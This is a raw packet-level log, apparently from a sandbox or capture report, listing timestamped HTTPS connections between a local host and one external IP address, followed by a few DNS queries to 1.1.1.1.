                                            Sep 16, 2024 12:23:10.454806089 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.178112984 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.178807974 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.178886890 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.179599047 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.179614067 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.437993050 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.438066959 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.438148022 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.438632965 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.438672066 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.438688993 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.438704014 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:13.493233919 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:13.493283987 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:13.493376017 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:13.493526936 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:13.493542910 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.116096020 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.117897987 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.117933035 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.119107008 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.119113922 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374258995 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374321938 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374375105 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.374835014 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.374855995 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374869108 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.374874115 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:16.539326906 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:16.539438009 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:16.539525986 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:16.539701939 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:16.539737940 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.182655096 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.184565067 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.184628963 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.191162109 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.191175938 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.444603920 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.444678068 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.444755077 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.445174932 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.445203066 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.445213079 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.445220947 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:19.556683064 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:19.556747913 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:19.556827068 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:19.556977987 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:19.557005882 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.254081964 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.296432972 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.412409067 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.412437916 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.493438005 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.493467093 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.670073032 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.670152903 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.670216084 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.682053089 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.682080984 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.682089090 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.682096004 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:22.754255056 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:22.754329920 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:22.754558086 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:22.754811049 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:22.754849911 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.367235899 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.367764950 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.367841005 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.368294954 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.368314028 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.624389887 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.624480963 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.624574900 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.625205994 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.625205994 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.625245094 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.625271082 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:25.798193932 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:25.798257113 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:25.798347950 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:25.798579931 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:25.798604965 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.436533928 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.437022924 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.437051058 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.438087940 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.438093901 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.697998047 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.698084116 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.698148012 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.698529005 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.698529005 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.698553085 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.698561907 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:28.814292908 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:28.814333916 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:28.814445972 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:28.814677954 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:28.814702034 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.453011990 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.453510046 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.453525066 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.454332113 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.454336882 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.715936899 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.716011047 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.716196060 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.716999054 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.716999054 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.717016935 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.717026949 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:32.845005035 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:32.845071077 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:32.845166922 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:32.845415115 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:32.845436096 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.461244106 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.461735010 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.461775064 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.462388992 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.462397099 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716103077 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716260910 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716320038 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.716614008 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.716629982 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716641903 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.716650009 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:36.860688925 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:36.860738993 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:36.860930920 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:36.861130953 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:36.861143112 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.485217094 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.485790014 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.485814095 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.486848116 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.486855984 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.741959095 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.742104053 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.742337942 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.742640018 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.742654085 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.742671013 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.742676020 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:41.438843966 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:41.438900948 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:41.438988924 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:41.439153910 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:41.439172983 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.061265945 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.061747074 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:42.061779976 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.062557936 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:42.062563896 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.319514990 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.319688082 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.319746971 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:42.321116924 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:42.321141005 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:42.321151018 CEST49777443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:42.321156979 CEST4434977789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:45.495415926 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:45.495460033 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:45.495532036 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:45.495697975 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:45.495707989 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.200675964 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.222031116 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:46.222059965 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.223320007 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:46.223325014 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.457739115 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.457923889 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.458028078 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:46.458561897 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:46.458590031 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:46.458604097 CEST49778443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:46.458611965 CEST4434977889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:49.767363071 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:49.767410994 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:49.767719030 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:49.767719030 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:49.767759085 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:50.385934114 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:50.386387110 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:50.386421919 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:50.387042046 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:50.387049913 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:50.641518116 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:50.641693115 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:50.641801119 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:50.647775888 CEST49779443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:50.647804022 CEST4434977989.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:53.955796957 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:53.955830097 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:53.955905914 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:53.956084013 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:53.956096888 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.598381042 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.598870993 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:54.598891973 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.599617004 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:54.599625111 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.859159946 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.859344959 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.859409094 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:54.859756947 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:54.859756947 CEST49780443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:54.859781027 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:54.859790087 CEST4434978089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:57.157696009 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:57.157732010 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:57.157831907 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:57.158001900 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:57.158020973 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:57.777571917 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:57.778444052 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:57.778460026 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:57.779040098 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:57.779046059 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:58.032857895 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:58.033037901 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:58.033102036 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:58.033312082 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:58.033345938 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:58.033361912 CEST49781443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:58.033370018 CEST4434978189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:01.190016985 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:01.190066099 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:01.190220118 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:01.190728903 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:01.190747023 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:01.821863890 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:01.822556973 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:01.822577000 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:01.823182106 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:01.823187113 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:02.080692053 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:02.080862045 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:02.080933094 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:02.086565018 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:02.086602926 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:02.086621046 CEST49782443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:02.086630106 CEST4434978289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:05.424283981 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:05.424329042 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:05.424474955 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:05.424627066 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:05.424643993 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.036102057 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.036624908 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:06.036642075 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.037357092 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:06.037364006 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.295264959 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.295351028 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.295444012 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:06.295897961 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:06.295897961 CEST49783443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:06.295919895 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:06.295932055 CEST4434978389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:09.470530987 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:09.470566034 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:09.470647097 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:09.470810890 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:09.470822096 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.083792925 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.084377050 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:10.084393024 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.085289955 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:10.085294008 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.344733953 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.344825983 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.344923973 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:10.345397949 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:10.345427990 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:10.345438957 CEST49784443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:10.345444918 CEST4434978489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:13.502645969 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:13.502764940 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:13.502947092 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:13.503259897 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:13.503290892 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.318687916 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.319348097 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:14.319430113 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.320056915 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:14.320074081 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.573340893 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.573409081 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.573466063 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:14.576180935 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:14.576205969 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:14.576229095 CEST49785443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:14.576235056 CEST4434978589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:18.924325943 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:18.924380064 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:18.924612999 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:18.925168991 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:18.925183058 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.544094086 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.544727087 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:19.544775009 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.545886993 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:19.545911074 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.803864956 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.804023981 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.804260015 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:19.804934978 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:19.804960012 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:19.804972887 CEST49786443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:19.804980040 CEST4434978689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:22.955032110 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:22.955091000 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:22.955214024 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:22.955463886 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:22.955475092 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.586515903 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.587033033 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:23.587049961 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.587738991 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:23.587743044 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.845778942 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.845875978 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.846029997 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:23.846606970 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:23.846626043 CEST4434978789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:24:23.846652031 CEST49787443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:24:23.846657991 CEST4434978789.163.145.170192.168.2.4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 16, 2024 12:22:23.275859118 CEST6206553192.168.2.41.1.1.1
                                            Sep 16, 2024 12:22:23.283305883 CEST53620651.1.1.1192.168.2.4
                                            Sep 16, 2024 12:22:27.094228983 CEST5410953192.168.2.41.1.1.1
                                            Sep 16, 2024 12:22:27.101197004 CEST53541091.1.1.1192.168.2.4
                                            Sep 16, 2024 12:22:27.934755087 CEST5764853192.168.2.41.1.1.1
                                            Sep 16, 2024 12:22:27.981240034 CEST53576481.1.1.1192.168.2.4
                                            Sep 16, 2024 12:22:28.006108046 CEST6079453192.168.2.41.1.1.1
                                            Sep 16, 2024 12:22:28.014050961 CEST53607941.1.1.1192.168.2.4
                                            Sep 16, 2024 12:22:30.835216045 CEST6544153192.168.2.41.1.1.1
